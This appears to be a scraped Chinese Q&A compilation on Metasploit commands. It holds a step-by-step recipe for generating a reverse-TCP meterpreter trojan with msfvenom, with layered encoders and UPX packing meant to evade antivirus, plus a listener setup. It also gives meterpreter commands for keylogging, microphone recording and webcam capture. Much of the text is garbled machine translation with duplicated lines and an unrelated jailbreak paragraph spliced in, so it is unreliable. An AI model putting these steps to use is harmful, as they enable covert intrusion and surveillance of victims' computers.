導航:首頁 > 程序命令 > msf命令

msf命令

發布時間:2022-01-16 01:46:29

⑴ msf 如何對外網主機進行瀏覽器漏洞滲透

(1)首先確定攻擊對象是誰,在msf中使用search命令找到可能使用的漏洞攻擊模塊並進入攻擊模塊。
(2)用info查看漏洞信息,設置payload以及相應的一些參數
(3)根據其使用方法,或運行後直接提權,或建立網頁等待訪問然後攻擊,或其他方式拷貝給靶機等待回連,具體情況具體分析
(4)成功提權或出現問題,出現問題時根據具體情況具體分析,msf中會給出一定的英文提示,要好好利用
(5)本實驗能加深對msf的理解。exploit我理解為偽裝以及攻擊平台,payload我理解為各種shell,encode我理解偽裝工具

⑵ 為什麼我啟動了msfconsole沒有msf終端

這可能是最流行的msfconsole界面MSF。它提供了一個「一體化」集中控制台,允許你有效地訪問到幾乎所有的選項可在Metasploit框架。Msfconsole起初看似嚇人的,但一旦你學習語法的命令,你將學會欣賞利用該介面的力量。msfconsole界面的窗戶都可以在3.3版本發布,但3.2版本的用戶將需要手動安裝Cygwin框架下,隨著紅寶石安裝補丁,或接觸控制台模擬器通過包括網站或GUI部件。
msfconsole的好處:
1.這是唯一辦法訪問大多數支持在Metasploit特點。
2.console-based界面提供了一個框架
3.含有最特點和是最穩定的無國界醫生的界面
4.充分readline支持,tabbing以及命令完成
5.在msfconsole外部命令的執行是可能的
msf > ping -c 1 192.168.1.2[*] exec: ping -c 1 192.168.1.2 PING 192.168.1.2 (192.168.1.2) 56(84) bytes of data. 64 bytes from 192.168.1.2: icmp_seq=1 ttl=128 time=10.3 ms --- 192.168.1.2 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 10.308/10.308/10.308/0.000 ms msf >

通過簡單的展開msfconsole運行。「從/ msfconsole命令行。你可以 msfconsole -h」,去看看別的用途。

輸入help或者?,顯示在msfconsole中的可用命令

標簽完成
這是msfconsole設計快速使用和特點之一,有助於這一目標是標簽完成。與各種各樣的模組可供選擇,就很難記得確切的名字和路徑的特殊模數你希望利用。同大多數的其他類型的貝殼,進入你所知道的和緊迫的標簽的會贈送一個列表選擇或自動完成你的字元串,如果只有一個選擇。標簽完成readline取決於延伸和幾乎每個指揮控制台支持標簽完成。

use exploit/windows/dce
use .*netapi.*
set LHOST
show
set TARGET
set PAYLOAD windows/shell/
exp
back
命令

msf auxiliary(ms09_001_write) > back msf >

check命令
沒有很多的利用,支持它,但也存在著一個「檢查'選項,看看一個目標是脆弱的,而不是一個特定的開發利用它實際上。
msf exploit(ms04_045_wins) > show options Mole options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.114 yes The target address RPORT 42 yes The target port Exploit target: Id Name -- ---- 0 Windows 2000 English msf exploit(ms04_045_wins) > check[-] Check failed: The connection was refused by the remote host (192.168.1.114:42)

connect命令 連接
有一個微型netcat克隆建成的msfconsole支持SSL,代理,旋轉、文件發送。發出「連接」命令一個ip地址和埠的號碼,你可以連接到一個遠程主機在msfconsole一樣的你會與netcat或遠程登錄。
msf > connect 192.168.1.1 23[*] Connected to 192.168.1.1:23 ??????!???? DD-WRT v24 std (c) 2008 NewMedia-NET GmbH Release: 07/27/08 (SVN revision: 10011) ? DD-WRT login:
通過「-」的連接,它將通過SSL連接:
msf > connect -s www.metasploit.com 443[*] Connected to www.metasploit.com:443 GET / HTTP/1.0 HTTP/1.1 302 Found Date: Sat, 25 Jul 2009 05:03:42 GMT Server: Apache/2.2.11 Location: http://www.metasploit.org/

run命令
msf auxiliary(ms09_001_write) > run Attempting to crash the remote host... datalenlow=65535 dataoffset=65535 fillersize=72 rescue datalenlow=55535 dataoffset=65535 fillersize=72 rescue datalenlow=45535 dataoffset=65535 fillersize=72 rescue datalenlow=35535 dataoffset=65535 fillersize=72 rescue datalenlow=25535 dataoffset=65535 fillersize=72 rescue ...snip...

irb命令
msf > irb[*] Starting IRB shell... >> puts "Hello, metasploit!" Hello, metasploit! => nil >> Framework::Version => "3.8.0-dev" >> framework.moles.keys.length =>1336

msfconsole

Retrieved from "http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Irb_Command"

jobs命令
msf exploit(ms08_067_netapi) > jobs -h Usage: jobs [options] Active job manipulation and interaction. OPTIONS: -K Terminate all running jobs. -h Help banner. -i Lists detailed information about a running job. -k Terminate the specified job name. -l List all running jobs. -v Print more detailed info. Use with -i and -l

load命令
load指揮從Metasploit載入一個插件的插件的目錄。通過參數的 'key=val' 的shell上。
msf > load Usage: load [var=val var=val ...] Load a plugin from the supplied path. The optional var=val options are custom parameters that can be passed to plugins. msf > load pcap_log[*] Successfully loaded plugin: pcap_logunload命令 卸掉
msf > load pcap_log [*] Successfully loaded plugin: pcap_log msf > unload pcap_log Unloading plugin pcap_log...unloaded.

loadpath命令
「loadpath」命令將載入一個third-part模塊樹為道路,這樣你就可以在你的0-day點Metasploit戰功,編碼器,有效載荷,等。
msf > loadpath /home/secret/moles Loaded 0 moles.

resource命令
一些攻擊(如Karmetasploit使用資源(批)文件,您可以通過msfconsole負載使用「資源」命令。這些文件是一個基本的腳本為msfconsole。它運行的命令在檔案按順序排列。稍後我們將探討,外面的Karmetasploit,可以是非常有用的。
msf > resource karma.rc resource> load db_sqlite3 [-][-] The functionality previously provided by this plugin has been [-] integrated into the core command set. Use the new 'db_driver' [-] command to use a database driver other than sqlite3 (which [-] is now the default). All of the old commands are the same. [-][-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin resource> db_create /root/karma.db [*] The specified database already exists, connecting [*] Successfully connected to the database [*] File: /root/karma.db resource> use auxiliary/server/browser_autopwn resource> setg AUTOPWN_HOST 10.0.0.1 AUTOPWN_HOST => 10.0.0.1 ...snip...

批處理文件可以大大加快測試和開發時間以及允許用戶自動化許多任務。除了載入一個批處理文件msfconsole從內部,但是它們還是可以通過使用「r」啟動國旗。簡單的範例創造一個批處理文件顯示Metasploit版本號在啟動。
root@bt:~# echo version > version.rc root@bt:~# ./msfconsole -r version.rc888 888 d8b888 888 888 Y8P888 888 888 888 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888 888 888 888 =[ metasploit v3.8.0-dev [core:3.8 api:1.0] + -- --=[ 688 exploits - 357 auxiliary - 39 post + -- --=[ 217 payloads - 27 encoders - 8 nops =[ svn r12668 updated today (2011.05.19) resource> version Framework: 3.8.0-dev.12644 Console : 3.8.0-dev.12651 msf >

route命令
「route」命令在Metasploit允許你通過路由卯會話或'comm',提供基本的旋轉能力。添加一個路線,你通過目標的子網和網路掩碼,緊隨其後的是會議(傳媒類)號碼。
msf exploit(ms08_067_netapi) > route Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid] Route traffic destined to a given subnet through a supplied session. The default comm is Local. msf exploit(ms08_067_netapi) > route add 192.168.1.0 255.255.255.0 2 msf exploit(ms08_067_netapi) > route print Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 192.168.1.0 255.255.255.0 Session 2

info命令
「info」命令將提供詳細的信息關於某個模塊包括所有的選擇,目標,和其他信息。一定要認真閱讀模塊描述使用它作為前可能有些un-desired效果。
信息的命令也提供以下信息:
1.作者和許可的信息
2.漏洞參考資料
3.任何有效載荷限制模塊
msf > info dos/windows/smb/ms09_001_write Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset Version: 6890 License: Metasploit Framework License (BSD) Provided by: j.v.vallejo
msf > info dos/windows/smb/ms09_001_write Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset Version: 6890 License: Metasploit Framework License (BSD) Provided by: j.v.vallejo
msf > info dos/windows/smb/ms09_001_write Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset Version: 6890 License: Metasploit Framework License (BSD) Provided by: j.v.vallejo
msf > info dos/windows/smb/ms09_001_write Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset Version: 6890 License: Metasploit Framework License (BSD) Provided by: j.v.vallejo

set 命令

'set'指令讓你配置框架選項和參數對當前模塊你處理。

msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1 RHOST => 192.168.1.1 msf auxiliary(ms09_001_write) > show options Mole options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.1 yes The target address RPORT 445 yes Set the SMB service port

最近的一份附加的性能在Metasploit是能力設定一個編碼器使用運行時間。這是特別有用的發展在利用你還不太確定的編碼方法,將工作載荷與開發。
msf exploit(ms08_067_netapi) > show encoders Compatible encoders =================== Name Description ---- ----------- cmd/generic_sh Generic Shell Variable Substitution Command Encoder generic/none The "none" Encoder mipsbe/longxor XOR Encoder mipsle/longxor XOR Encoder php/base64 PHP Base64 encoder ppc/longxor PPC LongXOR Encoder ppc/longxor_tag PPC LongXOR Encoder sparc/longxor_tag SPARC DWORD XOR Encoder x64/xor XOR Encoder x86/alpha_mixed Alpha2 Alphanumeric Mixedcase Encoder x86/alpha_upper Alpha2 Alphanumeric Uppercase Encoder x86/avoid_utf8_tolower Avoid UTF8/tolower x86/call4_dword_xor Call+4 Dword XOR Encoder x86/countdown Single-byte XOR Countdown Encoder x86/fnstenv_mov Variable-length Fnstenv/mov Dword XOR Encoder x86/jmp_call_additive Polymorphic Jump/Call XOR Additive Feedback Encoder x86/nonalpha Non-Alpha Encoder x86/nonupper Non-Upper Encoder x86/shikata_ga_nai Polymorphic XOR Additive Feedback Encoder x86/unicode_mixed Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper Alpha2 Alphanumeric Unicode Uppercase Encoder msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai encoder => x86/shikata_ga_nai

unset命令
相反的「set'命令,當然,是「unset」。「unset」去掉一個參數配置與「set'之前。你可以移除所有的變數與'unset all'。

msf > set RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 msf > set THREADS 50 THREADS => 50 msf > set Global ====== Name Value ---- ----- RHOSTS 192.168.1.0/24 THREADS 50 msf > unset THREADS Unsetting THREADS... msf > unset all Flushing datastore... msf > set Global ====== No entries in data store.

⑶ 怎樣更新metasploit中的模塊

1、打開msf,輸入命令use auxiliary/gather/shodan_search。

注意事項:

Metasploit的設計初衷是打造成一個攻擊工具開發平台,本書稍後將講解如何開發攻擊工具。然而在目前情況下,安全專家以及業余安全愛好者更多地將其當作一種點幾下滑鼠就可以利用其中附帶的攻擊工具進行成功攻擊的環境。

⑷ msf里怎麼添加db_del_host命令

你是黑闊!你是大黑闊阿!我膜拜黑闊了!

db_del_host那個腳本文件你有吧!你到metasploit的插件目錄!然後在控制台輸入loaddb_del_host就可以了!你是黑闊!怎麼辦!我看見黑闊了!我潛水去了!大黑闊!別射我阿!社工大牛helen菊花都沒有了阿!我匿名回答去了!我怕黑闊!

⑸ msf得到會話後可以監控屏幕嗎

msf得到的會話是命令行shell,其實功能還是很強大的,是無法監控屏幕的。但是windows/meterpreter/reverse_tcp這個payload有run vnc這個命令開啟遠程桌面,不過不怎麼好用。比較好用的是:
keyscan_start:開始鍵盤記錄
keyscan_mp:下載鍵盤記錄
keyscan_stop:結束鍵盤記錄
record_mic:錄制聲音(如果目標主機上有話筒的話)
webcam_chat:查看攝像頭介面
webcam_list:查看攝像頭列表
webcam_stream:獲取攝像頭視頻
上面這些命令都是用windows/meterpreter/reverse_tcp這個payload利用成功後才有的,其用法可以輸入-h查看。

⑹ metasploit中,使用什麼命令來載入模塊

1、show 命令沒有停按照時間排序的功能。
2、如果你想找具體的exploit可以受用search命令,search支持幾種關鍵字的查詢,但是也沒有支持時間的。
3、Metploit的exploit模塊除了用msfupdate升級之外,自己也可以寫,或者向其他人要,或者使用付費的方式,或者最新的shellcode,所以其他人有也是正常的,看情況了。如果就你沒有那就是你升級失敗了。
出現exploit failed和fetching required files類似提示錯誤,是電腦安裝新USB硬體驅動造成的,首先先換一個USB口試試,其次檢查安裝新的USB驅動的硬體,有部分驅動會和iPhone的USB驅動有沖突。當然開機F8帶網路的安全模式紅雪也是可以順利越獄的,因為安全模式是不載入驅動的。

⑺ MSF(metasploit)如何顯示最新的exploit

1,show 命令沒有停按照時間排序的功能。
2,如果你想找具體的exploit可以受用search命令,search支持幾種關鍵字的查詢,但是也沒有支持時間的。
3,Metploit的exploit模塊除了用msfupdate升級之外,自己也可以寫,或者向其他人要,或者使用付費的方式,或者最新的shellcode,所以其他人有也是正常的,看情況了。如果就你沒有那就是你升級失敗了。

⑻ 如何用msfvenom生成木馬程序

一,目的:熟悉msfvenom生成木馬程序過程,並執行和監聽控制.
二,工具:MSF
三,原理:msfvenom是msfpayload,msfencode的結合體,它的優點是單一,命令行,和效率.利用msfvenom生成木馬程序,並在目標機上執行,在本地監聽上線
四,過程:
1,查看幫助
命令: root# msfvenom -h
結果:

2,生成meterpreter payload 並利用shikata_ga_nai編碼,查看所需選項,利用 -o參數
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o
結果:

3,現在設置LHOST,即監聽主機IP和LPORT監聽埠,我是本地區域網測試,所以IP是192.168.1.113,埠設置成443.所以最後連接會通向192.168.1.113的443埠
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 『\x00』 LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
注:如果只是用msfpayload生成,簡單示例:
命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X > Desktop/abc.exe
多次生成可進行免殺:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acn.exe
upx加殼:upx -5 /root/Desktop/acn.exe
結果:

說明: -p payload
-e 編碼方式
-i 編碼次數
-b 在生成的程序中避免出現的值
LHOST,LPORT 監聽上線的主機IP和埠
-f exe 生成EXE格式
4,把生成的abc.exe放到win7下.執行.
5,在命令行下,打開msfconsole.
命令: root # msfconsole
6,本機監聽,因為之前用的是reverse_tcp,所以設置如下
命令: msf > use exploit/multi/handler
Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp
結果:

7,現在快完成了,設置LHOST,LPORT,並執行exploit,會發現有連接進來.

8,.驗證

⑼ kali linux: msfpayload無法找到命令

估計你更新了kali了,現在已經沒有msfpayload的命令了,換成msfvenom了。裡面集成了msfpayload和msfencode

⑽ mac下用metasploit怎麼將msf命令批量ln到bin中

首先確定目標主機是否有ms08-067漏洞,這一點確定後才可以進行攻擊,在配置好攻擊參數後使用命令:show options檢查一下所配置的參數是否都正確.

閱讀全文

與msf命令相關的資料

熱點內容
看電視可以用什麼app 瀏覽:943
安卓路由表怎麼看 瀏覽:76
10個小孩分糖果python 瀏覽:826
安卓app小紅點怎麼取消 瀏覽:288
馬哥linux面授 瀏覽:772
2345程序員 瀏覽:374
怎麼開啟網速顯示安卓 瀏覽:206
索尼950app怎麼樣 瀏覽:400
計算機畢設論文源碼 瀏覽:148
小米手機怎麼下載易媒體App 瀏覽:191
還原系統設計可以怎樣清理文件夾 瀏覽:670
北京時間校準伺服器雲伺服器 瀏覽:844
pythonexcel數據計算 瀏覽:49
內醫附院黨建APP怎麼下載 瀏覽:356
榮耀v20刷加密門禁卡 瀏覽:329
app緩沖視頻怎麼保存在手機 瀏覽:433
廣度優先演算法c語言 瀏覽:680
提高程序員競爭力 瀏覽:108
nfc可以開加密門卡嗎 瀏覽:675
如何知道網頁使用的伺服器是什麼 瀏覽:224